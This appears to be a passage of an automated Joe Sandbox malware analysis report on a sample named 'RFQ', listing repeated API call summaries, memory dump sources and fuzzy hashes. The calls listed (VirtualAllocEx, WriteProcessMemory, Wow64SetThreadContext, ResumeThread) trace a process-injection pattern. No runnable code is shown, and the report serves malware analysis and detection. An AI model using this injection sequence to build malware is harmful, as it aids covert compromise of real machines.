                                                                                                        • Opcode Fuzzy Hash: e827c3f98e37ed2eb0f7f43da3df64d8750df4269f425ac9b1242845adf8ac5b
                                                                                                        • Instruction Fuzzy Hash: 0D41E2B0C10619DFDB25CFA9C844BDEBBF5BF49304F20806AD418AB255DBB5594ACF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077B81B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 077B81B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B7BCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077B8290
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 077B7BCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 077B8290
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessRead
                                                                                                        • String ID:
                                                                                                        • API String ID: 1726664587-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0122DEA7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DuplicateHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 3793708945-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077B80CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0122BEF9,00000800,00000000,00000000), ref: 0122C10A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 1029625771-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 077B80CE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ResumeThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 947044025-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 077BC675
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostMessageW.USER32(?,00000010,00000000,?), ref: 077BC675
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017648770.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_77b0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessagePost
                                                                                                        • String ID:
                                                                                                        • API String ID: 410705778-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 0122BA7E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2009243448.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1220000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: HandleModule
                                                                                                        • String ID:
                                                                                                        • API String ID: 4139908857-0
                                                                                                        • Opcode ID: 6e4836d5ab58403e6ef569082bbf8c14832b47fa6adb5cd9c9e3d55b19cc1649
                                                                                                        • Instruction ID: 415139e1ab1b4c1574c8dbfe8e7561aa693788121b458b7444b716e7b0c09746
                                                                                                        • Opcode Fuzzy Hash: 6e4836d5ab58403e6ef569082bbf8c14832b47fa6adb5cd9c9e3d55b19cc1649
                                                                                                        • Instruction Fuzzy Hash: D01110B6C007498FDB20CF9AC444ADEFBF4EF88310F10841AD529A7210C379A545CFA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: PH]q
                                                                                                        • API String ID: 0-3168235125
                                                                                                        • Opcode ID: 8dfc12c0d836efb4c4c562833e7ca822b5d94af001bd1564107ceccf99b13982
                                                                                                        • Instruction ID: d9ed0a7e9103f3bb2984d6f10a245847f4696b049258b2247829aba1b12aba73
                                                                                                        • Opcode Fuzzy Hash: 8dfc12c0d836efb4c4c562833e7ca822b5d94af001bd1564107ceccf99b13982
                                                                                                        • Instruction Fuzzy Hash: 77A1C1B5B1021A8FDB18DF68C954AA9B7F6FF89310F1445B9D505AB3A1CB34DC81CBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Te]q
                                                                                                        • API String ID: 0-52440209
                                                                                                        • Opcode ID: 1a8b1355a51fc0c014d3c87bdffe4619ff26938d37f1fe8e50dfb6fb7682bf7d
                                                                                                        • Instruction ID: 9fb83d531c257c61545229b3c85979ad3888bf3a103fe57ed7e68a0928795698
                                                                                                        • Opcode Fuzzy Hash: 1a8b1355a51fc0c014d3c87bdffe4619ff26938d37f1fe8e50dfb6fb7682bf7d
                                                                                                        • Instruction Fuzzy Hash: 46113D71B0021A8BCB04EFB999105EFB6B6ABC4611B11407AC50AE7384EB358912CBE2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a34562c7cad8d24cd9e1b79cf97aad90646746a803b498163bb639068463ad9
                                                                                                        • Instruction ID: 12b92ea69915cb070ed5f7c1067a042e1088e5a039972341fea9a4eecc61c27f
                                                                                                        • Opcode Fuzzy Hash: 2a34562c7cad8d24cd9e1b79cf97aad90646746a803b498163bb639068463ad9
                                                                                                        • Instruction Fuzzy Hash: FA41947715C194DED312CBB4E4899E17FA0EF0262172A95ABD1DACA862DA349007CBD0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 621d40955e44b745f522e657e3d928c99d7889a1ed02d5c6babfb5e7786d76f1
                                                                                                        • Instruction ID: 8b87fe9316b7a06b928e3613751f5689768dc075c785acd809cfc1e2efe6618c
                                                                                                        • Opcode Fuzzy Hash: 621d40955e44b745f522e657e3d928c99d7889a1ed02d5c6babfb5e7786d76f1
                                                                                                        • Instruction Fuzzy Hash: 714191B1B003599FCB54AFA984546AFBBE6EBC4210F10886AE605D7381DF34DD468BE1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0228cbb81ce927a3134fd54c0e39bbbbf7fb8a5018a76f99e84c2d896f9e114d
                                                                                                        • Instruction ID: 0667dd2911db2c56fec2c5d2c30bc21d5417908ad461123d189024c428db6738
                                                                                                        • Opcode Fuzzy Hash: 0228cbb81ce927a3134fd54c0e39bbbbf7fb8a5018a76f99e84c2d896f9e114d
                                                                                                        • Instruction Fuzzy Hash: 0051C0F1A15316CFC7018BA9C940AEABBF5FF46204F14857BD0A5DB282D7399942CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 42cc2b1b59d129e305fd6492a2361ce64f0e80442db818d6f61be8d617157843
                                                                                                        • Instruction ID: 6e2217cba30a3b213817f2383c8c986aa46cdc0622669b53890fe117403be95e
                                                                                                        • Opcode Fuzzy Hash: 42cc2b1b59d129e305fd6492a2361ce64f0e80442db818d6f61be8d617157843
                                                                                                        • Instruction Fuzzy Hash: D851B0713206069FC7149F28D8A4A6AB7E6FF85310F108639E60ACB365DF71EC46CB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0327e958b5b40f7607178027c0033eb085ceee14db15b2581839a387f8cf8fa4
                                                                                                        • Instruction ID: 6cc1ee98c768c143de2660ada96d87452fe5971414131c4472f14905275d4ff5
                                                                                                        • Opcode Fuzzy Hash: 0327e958b5b40f7607178027c0033eb085ceee14db15b2581839a387f8cf8fa4
                                                                                                        • Instruction Fuzzy Hash: 76419DB5E002199FDB04CFA9D884AEEBBF2BB49300F14846AD819E7345E7749A45CF90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7c6e4167acdd0bda6c663bad2d17ef6f6ac6cb776fdc373d8416c1d5938a50bb
                                                                                                        • Instruction ID: 4bb098ed3c3ae4680979c0ba0133e3570d3f10003825a150f639aa8478a9e69c
                                                                                                        • Opcode Fuzzy Hash: 7c6e4167acdd0bda6c663bad2d17ef6f6ac6cb776fdc373d8416c1d5938a50bb
                                                                                                        • Instruction Fuzzy Hash: B341F8F4E25219DFCB00CFA9E8888EEBBB4FB4E300F005866D456A7351D7309815CBA8
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d010f8c457b1769ee1013b598cd329ad1457d881aedf3bb0be9de8250111eac1
                                                                                                        • Instruction ID: 4f92968654ff9100d8fa8ec091ea7eb56d7754a17ccd24e1f91727ff66247b08
                                                                                                        • Opcode Fuzzy Hash: d010f8c457b1769ee1013b598cd329ad1457d881aedf3bb0be9de8250111eac1
                                                                                                        • Instruction Fuzzy Hash: AF4180B0915209DFCB04DFE4C6559AEBBB6FF40704F15C8AAC0222B7A5D735C985CBA2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 687fc95346e9736a020a9695d49bec4b377f2b4c080df096efb4ef2d7f793bda
                                                                                                        • Instruction ID: dec1e83c66c11aadf9a74ea0aedfdfa979f3beaab56d10150b49426e1581b8a3
                                                                                                        • Opcode Fuzzy Hash: 687fc95346e9736a020a9695d49bec4b377f2b4c080df096efb4ef2d7f793bda
                                                                                                        • Instruction Fuzzy Hash: 7031A175B102158FCB14EB7998548BFBBFAEFC9220755452DE51AD7380DE30DC028B91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4ad7b11336e94fcdd840d3c2d0cae36cd0b261ce2a1b4fa6db9a22e5f618da0e
                                                                                                        • Instruction ID: 99873035c6b1286dbd68a3d780d4ec94c12e5d3de81e6d0fee5bcb2486ddd025
                                                                                                        • Opcode Fuzzy Hash: 4ad7b11336e94fcdd840d3c2d0cae36cd0b261ce2a1b4fa6db9a22e5f618da0e
                                                                                                        • Instruction Fuzzy Hash: 272190761082E4DED712CBB8D4899E17FA0EB1262172E91EBD5DACFC63D6249007CBC0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 58f6063e37d9d8cddffd09eaa808a1a4bddc7ddd6547ab21cff1078ce95f576f
                                                                                                        • Instruction ID: 5dbf9e8c6f758dbd2c098b98e94e294a70d4ea519600942c6399117aa1a75fcc
                                                                                                        • Opcode Fuzzy Hash: 58f6063e37d9d8cddffd09eaa808a1a4bddc7ddd6547ab21cff1078ce95f576f
                                                                                                        • Instruction Fuzzy Hash: 2531E471A00205DBDB119FA5C9407B6FBB2BF85308F14C9BAD4189B382D736E856C7A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6ffb2fdcb611aadeecd6df2959da6eafd1368415c3c1771c8df88dbbecead864
                                                                                                        • Instruction ID: 60eb9bb61bb16fef65c8a0d626c04155820de286bf24599ee0bf26d428ccbf97
                                                                                                        • Opcode Fuzzy Hash: 6ffb2fdcb611aadeecd6df2959da6eafd1368415c3c1771c8df88dbbecead864
                                                                                                        • Instruction Fuzzy Hash: 693100B1909264DBC710EBA9C6846BEB7B0EB42301F408D7BD522DB2D1D334D9A2CB81
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2c9db4bdda77c7ebbb7390acbaae195809de75bc0c6b2aa3150537e13296ed82
                                                                                                        • Instruction ID: d57c7390c7b8196731bebffb18746dba907c9045430883a49826a14d7c3f1e71
                                                                                                        • Opcode Fuzzy Hash: 2c9db4bdda77c7ebbb7390acbaae195809de75bc0c6b2aa3150537e13296ed82
                                                                                                        • Instruction Fuzzy Hash: F42128B1B117118BC7299B7A951062EBAEADFC5210B49857FC10A87BA0DE759802CB15
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2007760194.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ecd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2007760194.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ecd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2008072467.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_edd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2008072467.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_edd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2008072467.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_edd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2007760194.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ecd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2007760194.0000000000ECD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ECD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ecd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2008072467.0000000000EDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EDD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_edd000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017037657.00000000072F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_72f0000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2017309985.0000000007400000.00000040.00000800.00020000.00000000.sdmp, Offset: 07400000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7400000_RFQ.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Memory Dump Source
